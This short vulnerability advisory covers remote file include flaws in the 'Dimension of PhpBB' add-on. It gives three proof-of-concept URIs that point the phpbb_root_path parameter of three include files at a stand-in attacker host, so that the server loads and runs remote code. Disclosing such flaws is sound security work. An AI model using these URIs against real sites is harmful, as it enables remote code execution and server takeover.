Dimension of PhpBB Phpbb_Root_Path Multiple Remote File Include Vulnerabilities

Dimension of PhpBB Phpbb_Root_Path Multiple Remote File Include Vulnerabilities

An attacker can exploit this issue via a web client.

The following proof-of-concept URIs are available:

http://www.example.com/[path]/includes/functions_kb.php?phpbb_root_path=http://attacker's_site/script

http://www.example.com/[path]/includes/themen_portal_mitte.php?phpbb_root_path=http://attacker's_site/script

http://www.example.com/[path]/includes/logger_engine.php?phpbb_root_path=http://attacker's_site/script